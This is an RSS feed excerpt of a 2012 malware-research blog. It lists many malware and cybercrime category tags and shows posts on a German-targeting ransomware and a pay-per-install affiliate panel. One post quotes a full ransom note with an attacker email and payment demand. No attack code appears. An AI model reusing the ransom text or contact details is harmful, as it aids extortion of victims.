<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-5365964245877416061</atom:id><lastBuildDate>Sun, 27 May 2012 10:14:28 +0000</lastBuildDate><category>Italian</category><category>flash</category><category>15-Minut</category><category>Review of the SpyEye Toolkit v1.3.45</category><category>System Tool</category><category>911-013-30-35</category><category>who view my profil</category><category>Keygenning4newbies CrackMe 1 coded by tHE ANALYST</category><category>WapSyst</category><category>wtf seriously</category><category>IframeShop.net</category><category>AVG Anti-Virus</category><category>Napal Rogue Builder</category><category>security tool rogue</category><category>Point Of Sale</category><category>flash_player</category><category>24-tabs.ru</category><category>netox.biz</category><category>js.php infection</category><category>TDS</category><category>Hack.lu CTF Beer challenge</category><category>Fake Installer</category><category>LuTiN NoIR Small RSA keygenme for newbies</category><category>QunneD</category><category>HDD Doctor</category><category>Gold Installs</category><category>SexDerevo</category><category>Disk Recovery</category><category>fraud</category><category>Zenk-Security</category><category>Trojan.Ransom Fake Metropolitan Police</category><category>chk4me.com</category><category>facebook</category><category>killmbr</category><category>Malware Auto-downloader</category><category>CC</category><category>Security Guard 2012</category><category>Windows XP Recovery EDS</category><category>explorerr.exe</category><category>(xxxvideo.avi.exe)</category><category>Dorkbot.A</category><category>ArchSMS</category><category>Please bitchz i'm fabulous</category><category>Hacked</category><category>AWM Antivirus</category><category>423 877 0158</category><category>scan4you.net</category><category>winlock</category><category>0012140809940</category><category>Advanced Virus Remover</category><category>pirate</category><category>Crimepack</category><category>Wireshark Antivirus</category><category>diabetal.org</category><category>Mailien</category><category>fake defragmenter</category><category>my-sdesign.com</category><category>sha1</category><category>Antivirus Smart Protection</category><category>Replica Watches</category><category>WinRARc</category><category>mapped size</category><category>Fake BitDefender 2011</category><category>WinLocker Builder v0.4 Cracking Generated winlocks</category><category>27C3</category><category>Affiliates</category><category>7xVideo WG1</category><category>CMC</category><category>GDI</category><category>Security essentials 2010</category><category>pawn-shop.cc</category><category>Interview</category><category>Sales</category><category>Hackerzvoice</category><category>Browser SMS Hoax</category><category>Xc0d3r</category><category>redirector</category><category>CVE-2011-3544</category><category>Security essentials 2011</category><category>Bluetrash</category><category>Vertu</category><category>Security Shield</category><category>SpyEye Builder v1.2.50 (Botnet cracking session)</category><category>Trojan.Ransomware keygen</category><category>RBN Encryptor Software</category><category>Troj/Ransom-U</category><category>R3000</category><category>hack</category><category>Mcafee</category><category>Internet Explorer Emergency Mode</category><category>Ready to Ride v3</category><category>Spyware Protection Remover</category><category>Your Windows has been blocked</category><category>Win32.StartPage</category><category>Trojan.Ransom Microsoft Security Antivirus</category><category>April fool</category><category>blocker</category><category>StreamTorrent</category><category>Wizard Mobile</category><category>Soft Store</category><category>Three Elephant</category><category>WinDisk</category><category>v1.150.1</category><category>Buy Cheap OEM</category><category>Vertu Cash</category><category>Gigabid</category><category>TROJ_RANSOM.EWQ</category><category>Luo Yun Bin</category><category>Download binaries</category><category>RogueAV</category><category>winlocker</category><category>Game</category><category>AVG Antivirus</category><category>encoding</category><category>regedit</category><category>paysafecard</category><category>Braviax</category><category>Rovnix</category><category>KeygenMe</category><category>HTTP</category><category>BlackSofware</category><category>OEM Software</category><category>Trojan.FakeAV.LVT</category><category>PP</category><category>reverse</category><category>Element Scanner</category><category>Antivirus Clean 2011</category><category>Zentom System Guard</category><category>System Security</category><category>Trojan.Ransom (flash_player.exe) 8903452262600 8-903-452-26-2600</category><category>Pharma</category><category>Trojan.Ransom: La policía ESPAÑOLA</category><category>xxx_video_New4.exe</category><category>requirements specification</category><category>DarkCoderSc</category><category>IDA Pro</category><category>Fake AVG Anti-Virus</category><category>Хендехох</category><category>fake</category><category>PvE</category><category>RansomHelper 1.0 / Malware Auto-downloader</category><category>swf</category><category>Nocturne V4</category><category>java rhino</category><category>Sergio</category><category>xddd.66ghz.com</category><category>System Security rogue</category><category>back-end</category><category>Fake.HDD Master Utilities</category><category>Carder</category><category>Hard Drive crash</category><category>Wayback Machine</category><category>custom packer</category><category>banking</category><category>assembly</category><category>Smart Fortress 2012</category><category>2012</category><category>crackme</category><category>FakeInst</category><category>8 (906) 096-4547</category><category>Flash Player</category><category>bosi.su</category><category>Antimalware Doctor</category><category>gate</category><category>FakePoliceAlert</category><category>Demystifying</category><category>Phoenix</category><category>homoblocker</category><category>xm-91</category><category>7xTUBE</category><category>asm</category><category>life</category><category>Make users</category><category>Creating a online Ransomware unlocker</category><category>Keygenning</category><category>Cidox</category><category>fake documents</category><category>Malware Auto-downloader v1.3b xylibox</category><category>Encryption virus</category><category>Software Sellers</category><category>WinScan</category><category>HO HO HO</category><category>Parental Lock</category><category>virussign(3).exe</category><category>cryptovirus</category><category>AES</category><category>Traffic Distribution System</category><category>Smoke Bot</category><category>lulzsec.su</category><category>PharmIncome</category><category>Tracking Cyber Crime: Zip Archive Affiliate (Hoax SMS/Fake Installer)</category><category>MAD 1.7</category><category>kaspepsky.ru</category><category>bastard.su</category><category>booksnetdownloads.com</category><category>RSA</category><category>System Antivirus Microsoft 2011</category><category>gbot.exe</category><category>Trojan.Ransom (Pornoblocker)</category><category>exploit kit</category><category>yambaclick.com</category><category>SpyEye v1.3.x</category><category>Zaxar</category><category>Пантера</category><category>MemScan:Trojan.KillMBR.S</category><category>24hourdrugsource.com</category><category>AV</category><category>E-Set Antivirus 2011</category><category>bhstat</category><category>CleanThis</category><category>videograbber.dll</category><category>Internet Security 2010</category><category>acid.david9 ransomlock</category><category>reversing</category><category>zip-help.com</category><category>XOR</category><category>System plugin at address 0x3BC3 got critical error</category><category>WindowsTool</category><category>Credit Cards</category><category>W32.Xorist</category><category>Opera</category><category>VertuCash</category><category>fakeav</category><category>Gagarincash</category><category>fileunblock gmail.com</category><category>cracked as usual</category><category>Skimmers</category><category>happy new year</category><category>10293838</category><category>Tracking Cyber Crime: Golden Ducat</category><category>cybercrime</category><category>ieup.co.cc</category><category>see ya in 2012</category><category>VirusKeeper</category><category>89060964547</category><category>Internet Security 2012</category><category>web.archive.org</category><category>security-center inbox.lt</category><category>Meeting</category><category>Tracking Cyber Crime</category><category>blacksoftware.cc</category><category>click fraud</category><category>Napalm Rogue Builder</category><category>Smart Anti-Malware Protection</category><category>pay per install</category><category>primitive RunPE</category><category>greatbooksdownloads.com</category><category>porn2o-rolik2.avi.exe</category><category>Win32.Adware</category><category>RSA-1024</category><category>mybooksplace.com</category><category>GTA2</category><category>Adult</category><category>Security Scanner</category><category>PrivatCoin</category><category>ekoparty Security Conference 6 - Challenge ESET 2010</category><category>Home Safety Essential</category><category>Spam</category><category>gradebooksonline.com</category><category>Fake installers</category><category>Milestone Antivirus</category><category>Fast Disk</category><category>SpyEye</category><category>security116</category><category>yourbookdownloads.com</category><category>defrager</category><category>GpCode</category><category>CN1</category><category>steal</category><category>Affiliate</category><category>Fragus Exploit Kit</category><category>cpalead</category><category>Internet Security Guard</category><category>Brand Software</category><category>TrojanRansom.Xorist</category><category>Fake.HDD</category><category>Mayachok</category><category>Palladium Pro</category><category>Spyware Protection</category><category>Security Protection</category><category>How to submit a sample to antivirus companies</category><category>FindWindowA</category><category>NRB</category><category>Security Shield 2011</category><category>Antivirus AntiSpyware 2011</category><category>KEYGENiNG FooMe 1 With Xylitol</category><category>Private AV Checker</category><category>Security Center</category><category>Antivirus GT</category><category>Total security 2009</category><category>Cold$eal</category><category>Multirogue</category><category>77.221.149.219</category><category>AV-AFF.BIZ</category><category>Windows Software Protection</category><category>CenterCash</category><category>hackforum</category><category>Lame winlock</category><category>Filecoder</category><category>Vulnerabilities</category><category>ukash</category><category>vkpay inbox.ru</category><category>MBRLocker Builder v0.1</category><category>Antivir 2010</category><category>CRC32</category><category>Brainfuck</category><category>fake drafrag</category><category>Spanish Version</category><category>Trojan.MBRlock</category><category>Trojan.Ransom (flashplayer.exe)</category><category>File Secure 2.1</category><category>trizonta.ru</category><category>Gendarmerie Nationale</category><category>Malwarebytes' Anti-Malware</category><category>Trojan.Ransom (userinit.exe)</category><category>Money Racing AV</category><category>pwning</category><category>Fake scanner page</category><category>Lock Em All</category><category>Weird ransomware</category><category>Seftad</category><category>Trojan.Gpcoder.G</category><category>EsSandRe crackme</category><category>A-Fast Antivirus rogue keygen</category><category>Cloud Protection</category><category>Windows Problems Protector</category><category>Debug</category><category>EvaPharmacy</category><category>XSS</category><category>stubs</category><category>Plastic service</category><category>Turing</category><category>Your PC Protector</category><category>Other Equipment Manufacturer</category><category>184.107.77.70</category><category>winlocks</category><category>we-deal.net</category><category>Playstation</category><category>Trojan.Ransom (porno-rolik.avi.exe)</category><category>4B</category><category>ru-tabs.ru</category><category>Code Cave</category><category>Gribodemon</category><category>saliter.exe</category><category>easy</category><category>2in1pill.com</category><category>89261072166</category><category>Merry christmas</category><category>PPI</category><category>ThePefectTime.ru</category><category>Black Software</category><category>7xVideo</category><category>365pills</category><category>malwares</category><category>Java Atomic</category><category>pornozud</category><category>ANDI RAZVAN SIMION</category><category>AV Security Essentials</category><category>Chameleon rogue</category><category>Privacy Protection</category><category>Tracking Cyber Crime: AV-AFF.BIZ</category><category>SKY-Loader</category><category>System plugin at address 0x00874324 got critical error</category><category>asm.yeah.net</category><category>thebookssellers.com</category><category>WriteProcessMemory</category><category>ThinkPoint</category><category>Guard Online</category><category>Backdoor.IRC</category><category>Hack.lu 2k10 CTF "Pirates crackme" write-up Zenk-Security</category><category>CatTrade</category><category>PvP</category><category>bestavsoft2</category><category>Java.SMSSend</category><category>Avast</category><category>Smart Protection 2012</category><category>all your base are belong to us</category><category>Carding</category><category>lockscreen</category><category>Avast-antivirus-francais.exe</category><category>Malware Destructor 2011</category><category>yandex.ru</category><category>CashPartners</category><category>rogue</category><category>Malwox</category><category>HC Stealer</category><category>Fragus</category><category>XP Home Security 2011</category><category>Android.Spitmo</category><category>Millenium-Servers</category><category>Paypal</category><category>rupoppers.com</category><category>WindowsWebSecurity.exe</category><category>Surething Team</category><category>frmcp</category><category>cryptolib</category><category>DelFiles</category><category>7304461.exe</category><category>XJR Antivirus</category><category>uTorrent</category><category>zipmonster.ru</category><category>private_brute.exe</category><category>Malware Auto-downloader v1.7</category><category>pornoplayer.exe</category><category>Code</category><category>ID Cards</category><category>STR. DACIA 73</category><category>keylogger</category><category>Blackhole exploit kit v1.1.0</category><category>Personal Shield Pro</category><category>ZeuS</category><category>Malware Auto-downloader v1.6</category><category>Xylibox Malware Challenge 2# -  Solved</category><category>MyFullz</category><category>Alureon</category><category>Solution</category><category>SpyEye 1.3.41</category><category>Fags</category><category>EroDerevo</category><category>Wolfram Antivirus</category><category>SUTRA</category><category>SunWatches.ru</category><category>Trojan.KillFiles</category><category>ExManoize</category><category>AV Guard Online</category><category>Trojan:Win32/Ransom.BQ</category><category>premiumphones.ru</category><category>SpyEye v1.1.39 unpacked</category><category>digitalbooksonlinenow.com</category><category>Win32:KillMBR-D</category><category>Trojan-Ransom.Win32.Xorist</category><category>Adslock</category><category>Xylibox Malware Challenge 2# - RogueLock</category><category>rutabletki.com</category><category>BTC</category><category>Kit</category><category>Decoding Security Shield Fake scanner page</category><category>MBR</category><category>.NET</category><category>A "Loader" Case</category><category>bestAV</category><category>blackhole</category><category>FUD</category><category>WinRAR 2011</category><category>car documents</category><category>KeyGenMe for Newbies :: Progressive KeygenMe #1</category><category>XP Anti-Spyware 2011</category><category>Best Virus Protection</category><category>Unxoring TR.Ransom.Xorist</category><category>Video Grabber</category><category>replicaiphone.ru</category><category>Security Solution 2011</category><category>BitDefender Antivirus Pro 2011</category><category>cp</category><category>Skimmer</category><category>Antivirii 2011</category><category>safe-data.ru</category><category>Ripped</category><category>Virtualization</category><category>useless</category><category>How to debug MBR Ransomware</category><category>passports</category><category>update</category><category>malware reversing</category><category>Elgamal</category><category>gay</category><category>Security Essentials Ultimate Pack</category><category>BH</category><category>OpenCloud Antivirus</category><category>Exploit</category><category>Advanced Security Tool 2010 Security Central Home Personal Antivirus XP Deluxe Protector Win PC Antivirus Win PC Defender XP Police Antivirus IE-Security WinDefender 2009 and Total Secure 2009 rogue</category><category>Coguar</category><category>Malware Protection</category><category>3c09a47b4a673a9e46cb0de70b02454d</category><category>Spitmo</category><category>badbase.ru</category><category>super-socks.com</category><category>phishing</category><category>beware of fake banking applications</category><category>Trojan.Ransom (flash_player.exe)</category><category>sql</category><category>FakeAV GUI</category><category>Blackhole v1.2.1</category><category>7*108#</category><category>VAN32</category><category>Santander</category><category>Skimming</category><category>ngrBot</category><category>unpack</category><category>ATM</category><category>Avira</category><category>SpyEye v1.3</category><category>obfuscated</category><category>pornoblocker</category><category>5919019953695</category><category>Sakura Exploit Pack 1.0</category><category>base64</category><category>Yamba network</category><category>keygen</category><category>BitDefender_Antivirus_Pro_2011.exe</category><category>410011066189985</category><category>thesoftwaresellers.com</category><category>Rogue-Security-Product-As-A-Service</category><category>HoaxSMS</category><category>SKY-Loader v.1.2</category><category>SMS</category><category>zarkaa.info</category><category>NCR</category><category>Paypal shop</category><category>Fake MSE Alert</category><category>luxcash.ru</category><category>Cracking</category><category>luoyunbin</category><category>MS Removal Tool</category><category>Trojan.Ransom (bioritm.exe)</category><category>Security Sphere 2012</category><category>unpacked</category><category>System Check</category><category>SpyEye v1.2.99 lame</category><category>driving license</category><category>Sysinternals Antivirus</category><category>Umbrella</category><category>Ransomware</category><category>Brand Name Soft</category><category>winAD</category><category>ToXiiC</category><category>Internet Security 2011 rogue</category><category>variante</category><category>sig</category><category>fake pharma</category><category>MAD</category><category>Antivirus7 Antivirus8</category><category>Antivirus Protection</category><category>Fake scanner source code</category><category>Watch4.ru</category><category>unpacking</category><category>OEM</category><category>obfuscation</category><category>SpyEye Builder v1.1.39 (Botnet cracking session)</category><category>javascript</category><category>Windows Oversight Center</category><category>Fake Site</category><category>Pay For Install</category><category>CryptoService</category><category>Home Security Solutions</category><category>Ransomware Targeting Americans</category><category>Trojan.Kardphisher</category><category>Windows XP Restore</category><category>ukrtabletki.com</category><category>ya-snimu-ego</category><category>Diebold</category><category>Stimul Premium</category><category>Antivir Solution Pro AV Security Suite AntiSpyware Soft Antivirus Suite Antivirus Soft clone Rogue</category><category>Security Defender</category><category>System Fix</category><category>BRASOV (Romania)</category><category>Windows Threats Destroyer</category><category>Tracking Cyber Crime: BestAV and BlackSofware *Reloaded*</category><category>VertexNet v1.1.1 Loader</category><category>Fakealerts</category><category>doktordick.com</category><category>Silence Winlocker</category><category>Good Memory</category><category>Harm.Win32.FakeMbr.a</category><category>Avast.exe</category><category>FuLLz</category><category>Blackhole exploit kit v1.2.0</category><category>GPcoder.j</category><category>SpyEye variant</category><category>TotalProtect</category><category>php</category><category>Antivirus 7</category><category>Sadok</category><category>star-stat.com</category><category>Cycbot</category><category>Xylitol is powerful</category><category>Antivirus 8</category><category>pornoplayer</category><category>Fake Windows Activation</category><category>SpyEye v1.3 interface</category><category>Trojan.Ransom (virussign.exe)</category><category>Botnet</category><category>Hoax</category><category>WinLocker Builder v0.2 Cracking Generated winlocks</category><category>AV Security 2012</category><category>Antimalware PC Safety</category><category>WaveASM</category><category>file35820289892.exe</category><category>Disk Optimizer</category><category>locker</category><category>Phoenix Exploit Kit</category><category>Zip-Wap</category><category>Malware Protection Center</category><category>CigIncome</category><category>malware</category><category>yambaprivate.com</category><category>hash</category><category>XSSed</category><category>Rançongiciel</category><category>Spambot</category><category>code source</category><category>assembler</category><category>True Big Cash</category><category>Lizamoon variante</category><category>Eleonore</category><category>SUTRA TDS</category><category>Install_Flash-Player.exe</category><category>Inside the FakeAV Business</category><category>crypto/hash/calc tools</category><category>drizz</category><category>7xVideo D1</category><category>Delphi</category><category>pornorolik</category><category>Carberp</category><category>CCC</category><category>SpyEye Builder v1.2.60</category><category>Norton</category><category>Windows Disk</category><category>Trojan.Win32.KillMBR.aw</category><category>Coreguard Defense Center Protection Center Data Protection Digital Protection Your Protection User Protection Dr. Guard Paladin Antivirus AnVi Rogue</category><category>loader</category><category>Xylitol</category><category>Ransomware who XOR your file</category><category>UFDC</category><category>ransom</category><category>Меркурий</category><category>allocated memory</category><category>lock</category><category>Encoder Builder v2.31</category><category>Computer is blocked</category><category>vertudiamond.ru</category><category>OrgiGuru</category><category>Drugstore</category><category>banker</category><category>Cigarettes</category><category>Trojan.Ransom BKA Ransomware</category><category>see ya in 2k12</category><category>wlnrar-auth5.net</category><category>ukr-tabs.ru</category><category>MyReplica.ru</category><category>VMware</category><category>Yambo Financials</category><category>Luxury Cash</category><category>TR/Fraud</category><category>ransomblock</category><category>Tracking Cyber Crime: Virtest and Palevo (Private AV Checker) pwned</category><category>Antivirus 2011</category><category>worm</category><category>Essential Cleaner</category><category>Oficla</category><category>Windows license locked</category><category>dd2.ru</category><category>89653751844</category><category>SpyEye Builder v1.1.39</category><category>WinRAR</category><category>SMSSend</category><category>Trojan.Ransom (HomoBlocker)</category><category>Contemporary Profiling of Web Users</category><category>Dr.Web</category><category>client</category><category>Severa</category><category>cc-grabbers admin panel bender edition</category><category>FakeHDD</category><category>Winlock Builder [Private] v1.30</category><category>Trojan.Ransomware</category><category>Tracking Cyber Crime: WinAD gang (Ransom.DN/Win32.Timer) Traffic Distribution System</category><category>Aldibot</category><category>VB6 VirusTotal Mass rating tool</category><category>Trojan.Ransom (Lock Em All)</category><category>Xylibox</category><category>luvservice.be</category><category>Sysinternals Antivirus XJR Antivirus AKM Antivirus 2010 Pro Your PC Protector Wireshark Antivirus rogue</category><category>blocked</category><category>Rev0Lt</category><category>Université Française de Cracking</category><category>back soon</category><category>BAT.KillFiles</category><category>PC Defender antivirus rogue</category><category>XP Total Security 2011</category><category>Fake Kaspersky</category><category>Blackhole Exploit Kit</category><category>upx</category><category>Ransomlock</category><category>Trojan.Win32.KillMBR</category><category>reseller</category><category>PEcompact2</category><category>Web RAT</category><category>Win32.Buzus</category><category>RSA javascript</category><category>XP Anti-Virus 2011</category><category>Another cc-grabbers admin panel</category><category>GCodeRogue</category><category>VirtualProtectEx</category><category>GpCode 2010</category><category>Trojan.HDDKill.517</category><category>stealer</category><category>Advanced PC Shield 2012</category><category>Adware</category><category>hotwatches.ru</category><category>Sakura exploit kit</category><category>Introduction au cracking sous Linux</category><category>avastfrance.com</category><category>POS</category><category>VirusTotal</category><category>Bombacash</category><category>Trojan.Ransom.Boot</category><category>sacem</category><category>GEMA</category><category>SpyEye v1.3.39</category><category>zip-archive.com</category><category>FakeAV Site</category><category>Tracking Cyber Crime: Ready to Ride v3 (Win32/Cycbot Affiliate)</category><category>Lux Cash</category><category>SpyEye 1.3.48</category><category>U235459552163</category><category>Phoenix Exploit Kit 3.1</category><category>Adslock.A</category><category>Caixa Penedès</category><category>Cracking SpyEye 1.3.x</category><category>ZipArchive</category><category>0973467457475070215340537432225</category><category>FLASH10.exe</category><category>Hoax SMS</category><category>Lamers</category><category>iferrari.ru</category><category>sevantivir.com</category><category>Removal Guide</category><category>AKM Antivirus 2010 Pro</category><category>Xorist.c</category><category>System Security 2011</category><category>FakeAV Business</category><category>CVE-2010-1885</category><category>Tritax</category><category>lame</category><category>multi-scan.com</category><category>Total Protect</category><category>Books Sellers</category><category>Memory Optimizer</category><category>U157727070520</category><category>rx-partners.biz</category><category>Fake E-Set Antivirus 2011</category><category>av checker</category><category>xxx_video_32605.avi.exe</category><category>malware unpacking</category><category>bundespolizei</category><category>Security Monitor 2012</category><category>Trojan.KillMBR.ap</category><category>mainpanel</category><category>HadèsKey</category><category>Firefox_update.exe</category><category>Malware Auto-downloader v1.5 xylibox</category><category>SpyEye 1.3.45</category><category>ProfitBins.ru</category><category>variablesmscheck.hispamediamarketing.com</category><category>coding</category><category>screenshot</category><category>Trojan.Ransom (flash_player.exe variant)</category><category>proxies</category><category>Super AV</category><category>Malware Auto-downloader v1.4 xylibox</category><category>Winlocker builder</category><category>Herpes</category><category>Malware Auto-downloader v1.7 Revision 3</category><category>Digital Store</category><category>ZwResumeThread</category><category>Mystic Compressor</category><category>Eleonore Exploits pack v1.2</category><category>winlock targeting French people</category><category>findvirus.ru</category><category>инфа</category><category>Trojan.Ransom</category><category>MISC</category><category>Lock Em All variante</category><category>DSC0912637.scr a194e793d739fb40b217b5775a6c7250 BR malware</category><category>Hyperlisk</category><category>XP Internet Security 2011</category><category>pwned</category><category>TeamkNast</category><category>female-orgazm.com</category><category>QuickBasic</category><category>Security essentials 2011 Security essentials 2010 Internet Security 2010 Advanced Virus Remover</category><category>BlueFlare Antivirus</category><category>Android</category><category>linux</category><category>Mobile</category><category>HDD Defragmenter System Defragmenter rogue</category><category>AES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ Ransomware</category><category>Security Shield Pro 2011</category><category>AES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ Ransomware Trojan-Ransom.Win32.Gpcode.bn</category><category>Antimalware Tool</category><category>cardsmarket.su</category><category>multi-rogue</category><category>vb6</category><category>Security Tool</category><category>SEO</category><category>ishygddt</category><category>malwox.biz</category><category>WaterEffect</category><category>4093245501</category><category>AV Protection Online</category><category>Win32/Kelihos.B</category><category>fail</category><category>Windows Scan</category><category>video72.avi.exe</category><category>+16464816878</category><title>XyliBox</title><description>Another blog, Another box.</description><link>http://www.xylibox.com/</link><managingEditor>noreply@blogger.com (Steven K)</managingEditor><generator>Blogger</generator><openSearch:totalResults>456</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Xylibox" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="xylibox" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-1569204964036596360</guid><pubDate>Sat, 26 May 2012 14:22:00 +0000</pubDate><atom:updated>2012-05-26T16:22:58.905+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">winlock</category><category domain="http://www.blogger.com/atom/ns#">security-center inbox.lt</category><category domain="http://www.blogger.com/atom/ns#">Ransomware</category><category domain="http://www.blogger.com/atom/ns#">v1.150.1</category><category domain="http://www.blogger.com/atom/ns#">Xylitol</category><category domain="http://www.blogger.com/atom/ns#">Please bitchz i'm fabulous</category><title>What the...</title><description>&lt;img border="0" src="http://4.bp.blogspot.com/-YouXhaQCws4/T8DhuoYIUAI/AAAAAAAAGPY/Sx9dL-5bm8w/s1600/icons.PNG" /&gt;&lt;br /&gt;Got contacted yesterday, about a threat.&lt;br /&gt;A ransomware who target german people use actually a crypter... and a message was leaved to me on the stub...&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-VF--RprvB9M/T8DduHzcXHI/AAAAAAAAGO0/1DqG9A0OS9M/s1600/Olly.1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="258" src="http://2.bp.blogspot.com/-VF--RprvB9M/T8DduHzcXHI/AAAAAAAAGO0/1DqG9A0OS9M/s400/Olly.1.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;When unpack it's just some deja-vu:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-GMI9oX2xWq0/T8DhD1a60zI/AAAAAAAAGPQ/CLX3h5SF1t0/s1600/Olly.2.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-GMI9oX2xWq0/T8DhD1a60zI/AAAAAAAAGPQ/CLX3h5SF1t0/s400/Olly.2.PNG" width="312" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-z2DxjMZkjks/T8DiBopuGII/AAAAAAAAGPg/UlwMr1m0xGY/s1600/ransom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-z2DxjMZkjks/T8DiBopuGII/AAAAAAAAGPg/UlwMr1m0xGY/s400/ransom.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;A file "ACHTUNG-LESEN.txt" is leaved on the desktop&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;Sehr geehrte Damen und Herren,&lt;br /&gt;anscheinend wurde das Update Programm vollständig unterbrochen. Jetzt kann das Virus nur manuell beseitigt werden. Dies brauchen Sie um Ihre Dateien benutzen zu können. Falls Sie also die gesperrten Daten brauchen, senden Sie uns bitte 200 Euro Ukash Code an die Email: security-center@inbox.lt, so bald dieser Code geprüft wurde, erhalten Sie ein Update Programm. Falls Sie Ihre Daten nicht brauchen raten wir Ihnen dringend Ihren Computer zu formatieren um den Virus vollständig zu entfernen. Ukash können Sie an einer beliebigen Tankstelle erwerben und auch in mehreren Internetcafes in Ihrer Nähe.&lt;br /&gt;mfG Ihr Security Team&lt;/div&gt;&lt;br /&gt;And everything is encoded&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-AWyIowIcnIw/T8DkQ924EkI/AAAAAAAAGPo/Y6puSpoEPME/s1600/encoded.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-AWyIowIcnIw/T8DkQ924EkI/AAAAAAAAGPo/Y6puSpoEPME/s400/encoded.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-1569204964036596360?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/what.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-YouXhaQCws4/T8DhuoYIUAI/AAAAAAAAGPY/Sx9dL-5bm8w/s72-c/icons.PNG" height="72" width="72" /><thr:total>6</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-2563861059850484974</guid><pubDate>Wed, 23 May 2012 21:56:00 +0000</pubDate><atom:updated>2012-05-23T23:56:35.551+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PPI</category><category domain="http://www.blogger.com/atom/ns#">Gold Installs</category><category domain="http://www.blogger.com/atom/ns#">Affiliate</category><category domain="http://www.blogger.com/atom/ns#">primitive RunPE</category><category domain="http://www.blogger.com/atom/ns#">FUD</category><category domain="http://www.blogger.com/atom/ns#">Smoke Bot</category><title>Gold Installs Affiliate</title><description>Advert:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-7XILv-mAi-U/T7yEkx36kbI/AAAAAAAAGKY/cRyDVUCL8u0/s1600/GoldInstalls.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-7XILv-mAi-U/T7yEkx36kbI/AAAAAAAAGKY/cRyDVUCL8u0/s400/GoldInstalls.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;ICQ:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-MUeENrdkuyI/T7yDwA18DHI/AAAAAAAAGKQ/wWTQTOosvkg/s1600/ICQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-MUeENrdkuyI/T7yDwA18DHI/AAAAAAAAGKQ/wWTQTOosvkg/s400/ICQ.png" width="353" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-BWK6E5VLxdk/T7yE6c39XxI/AAAAAAAAGKg/U6K6Bm5wUlQ/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-BWK6E5VLxdk/T7yE6c39XxI/AAAAAAAAGKg/U6K6Bm5wUlQ/s400/1.login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;News:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-WjTY0ImtVac/T7yDIPQj7qI/AAAAAAAAGJg/PsE1WzhJTbE/s1600/2.news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-WjTY0ImtVac/T7yDIPQj7qI/AAAAAAAAGJg/PsE1WzhJTbE/s400/2.news.png" width="400" 